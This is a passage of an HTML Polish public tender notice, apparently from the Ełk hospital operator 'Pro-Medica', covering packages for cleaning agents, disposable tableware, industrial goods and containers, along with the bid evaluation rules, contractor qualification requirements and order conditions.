terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.<br/>7. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są<br/>zobowiązani do przedstawienie wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>8. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w Rozdziale<br/>XVI SWZ.<br/>9. Jeżeli termin związania oferta upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie<br/>Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgodny na wybór jego oferty.<br/>10. W przypadku braku zgody, o której mowa w punkcie powyżej oferta podlega odrzuceniu,<br/>zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została<br/>najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 5 - Środki czystości </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39830000-9 - Środki czyszczące</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33741100-7 - Środek do mycia rąk</p> <p class="mb-0">39822000-0 - Alkaliczne środki czyszczące</p> <p class="mb-0">39831600-2 - Środki do czyszczenia toalet</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze i ocenie oferty najkorzystniejszej Zamawiający będzie<br/>postępował zgodnie z wymaganiami ustawy Pzp oraz kierował się kryteriami oceny ofert określonymi w<br/>niniejszej SWZ.<br/>2. Przy wyborze oferty w danym Pakiecie Zamawiający będzie kierował się kryterium najniższej ceny.<br/>3. Zamawiający wybierze ofertę z najniższą ceną brutto spośród wszystkich złożonych ofert<br/>niepodlegających odrzuceniu.<br/>4. Każdy Pakiet podlegać będzie odrębnej ocenie.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w Ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.<br/>6. W sytuacji gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu<br/>na to, że zostały złożone oferty o takiej samej cenie wezwie on Wykonawców którzy złożyli te oferty,<br/>do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.<br/>7. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są<br/>zobowiązani do przedstawienie wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>8. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w Rozdziale<br/>XVI SWZ.<br/>9. Jeżeli termin związania oferta upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie<br/>Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgodny na wybór jego oferty.<br/>10. W przypadku braku zgody, o której mowa w punkcie powyżej oferta podlega odrzuceniu,<br/>zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została<br/>najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 6 - Naczynia jednorazowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39222100-5 - Artykuły cateringowe jednorazowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39222110-8 - Sztućce i talerze jednorazowe</p> <p class="mb-0">39222120-1 - Kubki jednorazowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze i ocenie oferty najkorzystniejszej Zamawiający będzie<br/>postępował zgodnie z wymaganiami ustawy Pzp oraz kierował się kryteriami oceny ofert określonymi w<br/>niniejszej SWZ.<br/>2. Przy wyborze oferty w danym Pakiecie Zamawiający będzie kierował się kryterium najniższej ceny.<br/>3. Zamawiający wybierze ofertę z najniższą ceną brutto spośród wszystkich złożonych ofert<br/>niepodlegających odrzuceniu.<br/>4. Każdy Pakiet podlegać będzie odrębnej ocenie.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w Ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.<br/>6. W sytuacji gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu<br/>na to, że zostały złożone oferty o takiej samej cenie wezwie on Wykonawców którzy złożyli te oferty,<br/>do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.<br/>7. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są<br/>zobowiązani do przedstawienie wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>8. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w Rozdziale<br/>XVI SWZ.<br/>9. Jeżeli termin związania oferta upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie<br/>Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgodny na wybór jego oferty.<br/>10. W przypadku braku zgody, o której mowa w punkcie powyżej oferta podlega odrzuceniu,<br/>zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została<br/>najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 7 - Artykuły przemysłowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31440000-2 - Baterie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">19520000-7 - Produkty z tworzyw sztucznych</p> <p class="mb-0">24955000-3 - Chemiczne preparaty toaletowe</p> <p class="mb-0">33700000-7 - Produkty do pielęgnacji ciała</p> <p class="mb-0">33721000-0 - Golarki</p> <p class="mb-0">34928480-6 - Pojemniki i kosze na odpady i śmieci</p> <p class="mb-0">39221130-7 - Pojemniki na żywność</p> <p class="mb-0">39224340-3 - Kosze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze i ocenie oferty najkorzystniejszej Zamawiający będzie<br/>postępował zgodnie z wymaganiami ustawy Pzp oraz kierował się kryteriami oceny ofert określonymi w<br/>niniejszej SWZ.<br/>2. Przy wyborze oferty w danym Pakiecie Zamawiający będzie kierował się kryterium najniższej ceny.<br/>3. Zamawiający wybierze ofertę z najniższą ceną brutto spośród wszystkich złożonych ofert<br/>niepodlegających odrzuceniu.<br/>4. Każdy Pakiet podlegać będzie odrębnej ocenie.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w Ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.<br/>6. W sytuacji gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu<br/>na to, że zostały złożone oferty o takiej samej cenie wezwie on Wykonawców którzy złożyli te oferty,<br/>do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.<br/>7. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są<br/>zobowiązani do przedstawienie wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>8. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w Rozdziale<br/>XVI SWZ.<br/>9. Jeżeli termin związania oferta upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie<br/>Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgodny na wybór jego oferty.<br/>10. W przypadku braku zgody, o której mowa w punkcie powyżej oferta podlega odrzuceniu,<br/>zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została<br/>najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 8 - Pojemniki </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44619000-2 - Inne pojemniki</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39221130-7 - Pojemniki na żywność</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze i ocenie oferty najkorzystniejszej Zamawiający będzie<br/>postępował zgodnie z wymaganiami ustawy Pzp oraz kierował się kryteriami oceny ofert określonymi w<br/>niniejszej SWZ.<br/>2. Przy wyborze oferty w danym Pakiecie Zamawiający będzie kierował się kryterium najniższej ceny.<br/>3. Zamawiający wybierze ofertę z najniższą ceną brutto spośród wszystkich złożonych ofert<br/>niepodlegających odrzuceniu.<br/>4. Każdy Pakiet podlegać będzie odrębnej ocenie.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w Ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.<br/>6. W sytuacji gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu<br/>na to, że zostały złożone oferty o takiej samej cenie wezwie on Wykonawców którzy złożyli te oferty,<br/>do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.<br/>7. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są<br/>zobowiązani do przedstawienie wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>8. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w Rozdziale<br/>XVI SWZ.<br/>9. Jeżeli termin związania oferta upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie<br/>Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgodny na wybór jego oferty.<br/>10. W przypadku braku zgody, o której mowa w punkcie powyżej oferta podlega odrzuceniu,<br/>zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została<br/>najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 9 - Pozostałe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42968200-1 - Maszyny wydające artykuły toaletowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15800000-6 - Różne produkty spożywcze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze i ocenie oferty najkorzystniejszej Zamawiający będzie<br/>postępował zgodnie z wymaganiami ustawy Pzp oraz kierował się kryteriami oceny ofert określonymi w<br/>niniejszej SWZ.<br/>2. Przy wyborze oferty w danym Pakiecie Zamawiający będzie kierował się kryterium najniższej ceny.<br/>3. Zamawiający wybierze ofertę z najniższą ceną brutto spośród wszystkich złożonych ofert<br/>niepodlegających odrzuceniu.<br/>4. Każdy Pakiet podlegać będzie odrębnej ocenie.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w Ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.<br/>6. W sytuacji gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu<br/>na to, że zostały złożone oferty o takiej samej cenie wezwie on Wykonawców którzy złożyli te oferty,<br/>do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.<br/>7. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są<br/>zobowiązani do przedstawienie wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>8. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w Rozdziale<br/>XVI SWZ.<br/>9. Jeżeli termin związania oferta upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie<br/>Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgodny na wybór jego oferty.<br/>10. W przypadku braku zgody, o której mowa w punkcie powyżej oferta podlega odrzuceniu,<br/>zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została<br/>najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Katalogi lub karty produktowe producenta zawierające opisy potwierdzające właściwości proponowanego asortymentu zgodnego z Załącznikiem nr 3 do SWZ – Formularzem Asortymentowo-Cenowym (m. in. składu, gramatury, wymiarów, chłonności, odporności na pranie w określonej temperaturze). <br/>2. (Dotyczy Pakietu 2) Oświadczenie lub zapis w karcie produktu, że asortyment z dopuszczony jest do utylizacji przez spalanie. Wykonawca na każde żądanie Zamawiającego przedstawi poświadczone za zgodność z oryginałem kserokopie pozwoleń (świadectw).<br/>3. (Dotyczy Pakietu 5) Karty charakterystyki potwierdzające zgodność asortymentu z Ustawą z dnia 25 lutego 2021r. O substancjach chemicznych i ich mieszaninach (Dz.U. 2011 nr 63 poz. 322)<br/>4. (Dotyczy Pakietu 6) Oświadczenie Wykonawcy o zgodności proponowanego asortymentu z Ustawą z 16.11.2020 r. o bezpieczeństwie żywności i żywienia (Dz.U. 2020 poz. 2021) oraz o dopuszczeniu do kontaktu z żywnością oraz że opakowania i naczynia jednorazowe są zgodne z aktualnie obowiązującymi przepisami prawa oraz z Wytycznymi Komisji dotyczące produktów jednorazowego użytku z tworzyw sztucznych na podstawie dyrektywy PE i R (UE)2019/904 w sprawie zmniejszania wpływu niektórych produktów z tworzyw sztucznych na środowisko (2021/C 216/01) zgodnie z Załącznikiem nr 5 do SWZ.<br/>5. (Dotyczy pakietu 1 i 3 poz. 4, 5, 6) Oświadczenie Wykonawcy, że posiada dopuszczenia do obrotu na każdy oferowany produkt (w postaci Deklaracji Zgodności wydanej przez producenta oraz Deklarację Zgodności CE wydaną przez jednostkę notyfikacyjną (jeżeli dotyczy) zgodnie z ustawą z dnia 20.05.2010 r. o wyrobach medycznych (tj. Dz. U. z 2021 r., poz. 1565) – zgodnie z Załącznikiem nr 6 do SWZ, a w przypadku żądania Zamawiającego przedłoży poświadczone za zgodność z oryginałem kserokopie tych pozwoleń (świadectw) a jeżeli przedmiot zamówienia nie został sklasyfikowany jako wyrób medyczny i zgodnie z dyrektywami europejskimi i ustawą o wyrobach medycznych nie jest objęty deklaracjami zgodności i nie podlega żadnemu wpisowi do rejestru Zamawiający wymaga jedynie złożenia stosownego oświadczenia<br/>6. Oświadczenie Wykonawcy, że posiada dopuszczenia do obrotu na każdy oferowany produkt (w postaci Deklaracji Zgodności wydanej przez producenta a w przypadku żądania Zamawiającego przedłoży poświadczone za zgodność z oryginałem kserokopie tych pozwoleń (świadectw).<br/>7. (Dotyczy Pakietu 2) - Próbki worków foliowych po 10 szt każdego rozmiaru (kolor nie ma znaczenia). Próbki powinny być tak oznakowane, by umożliwiały identyfikację Wykonawcy oraz z podaniem nr pakietu, asortymentu, rozmiaru którego dotyczy. <br/>8. (Dotyczy Pakietu 3) - Próbki z poz. 1, 2, 3, 4 po 2 szt. Próbki powinny być tak oznakowane, by umożliwiały identyfikację Wykonawcy oraz z podaniem nr pakietu, asortymentu którego dotyczy. <br/>Próbki należy przysłać na adres Zamawiającego „Pro-Medica” w Ełku Sp. z o.o., ul. Baranki 24, 19-300 Ełk, Sekretariat Piętro V (godziny pracy sekretariatu to 700 – 1500. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. Katalogi lub karty produktowe producenta zawierające opisy potwierdzające właściwości proponowanego asortymentu zgodnego z Załącznikiem nr 3 do SWZ – Formularzem Asortymentowo-Cenowym (m. in. składu, gramatury, wymiarów, chłonności, odporności na pranie w określonej temperaturze). <br/>2. (Dotyczy Pakietu 2) Oświadczenie lub zapis w karcie produktu, że asortyment z dopuszczony jest do utylizacji przez spalanie. Wykonawca na każde żądanie Zamawiającego przedstawi poświadczone za zgodność z oryginałem kserokopie pozwoleń (świadectw).<br/>3. (Dotyczy Pakietu 5) Karty charakterystyki potwierdzające zgodność asortymentu z Ustawą z dnia 25 lutego 2021r. O substancjach chemicznych i ich mieszaninach (Dz.U. 2011 nr 63 poz. 322)<br/>4. (Dotyczy Pakietu 6) Oświadczenie Wykonawcy o zgodności proponowanego asortymentu z Ustawą z 16.11.2020 r. o bezpieczeństwie żywności i żywienia (Dz.U. 2020 poz. 2021) oraz o dopuszczeniu do kontaktu z żywnością oraz że opakowania i naczynia jednorazowe są zgodne z aktualnie obowiązującymi przepisami prawa oraz z Wytycznymi Komisji dotyczące produktów jednorazowego użytku z tworzyw sztucznych na podstawie dyrektywy PE i R (UE)2019/904 w sprawie zmniejszania wpływu niektórych produktów z tworzyw sztucznych na środowisko (2021/C 216/01) zgodnie z Załącznikiem nr 5 do SWZ.<br/>5. (Dotyczy pakietu 1 i 3 poz. 4, 5, 6) Oświadczenie Wykonawcy, że posiada dopuszczenia do obrotu na każdy oferowany produkt (w postaci Deklaracji Zgodności wydanej przez producenta oraz Deklarację Zgodności CE wydaną przez jednostkę notyfikacyjną (jeżeli dotyczy) zgodnie z ustawą z dnia 20.05.2010 r. o wyrobach medycznych (tj. Dz. U. z 2021 r., poz. 1565) – zgodnie z Załącznikiem nr 6 do SWZ, a w przypadku żądania Zamawiającego przedłoży poświadczone za zgodność z oryginałem kserokopie tych pozwoleń (świadectw) a jeżeli przedmiot zamówienia nie został sklasyfikowany jako wyrób medyczny i zgodnie z dyrektywami europejskimi i ustawą o wyrobach medycznych nie jest objęty deklaracjami zgodności i nie podlega żadnemu wpisowi do rejestru Zamawiający wymaga jedynie złożenia stosownego oświadczenia<br/>6. Oświadczenie Wykonawcy, że posiada dopuszczenia do obrotu na każdy oferowany produkt (w postaci Deklaracji Zgodności wydanej przez producenta a w przypadku żądania Zamawiającego przedłoży poświadczone za zgodność z oryginałem kserokopie tych pozwoleń (świadectw). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wypełniony i podpisany formularz oferty stanowiący Załącznik nr 1 do SWZ.<br/>2. Wypełnione i podpisane oświadczenia, o którym mowa w Rozdziale IX ust. 1<br/>SWZ – zgodnie z Załącznikiem nr 2 do SWZ ;<br/>3. Formularz Asortymentowo-Cenowy (FAC) – zgodnie z Załącznikiem nr 3 do SWZ, wypełniony<br/>i podpisany zgodnie z postanowieniami SWZ, <br/>4. Odpowiednie pełnomocnictwa <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi – w zależności od<br/>przedmiotu prowadzonego postępowania - wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA 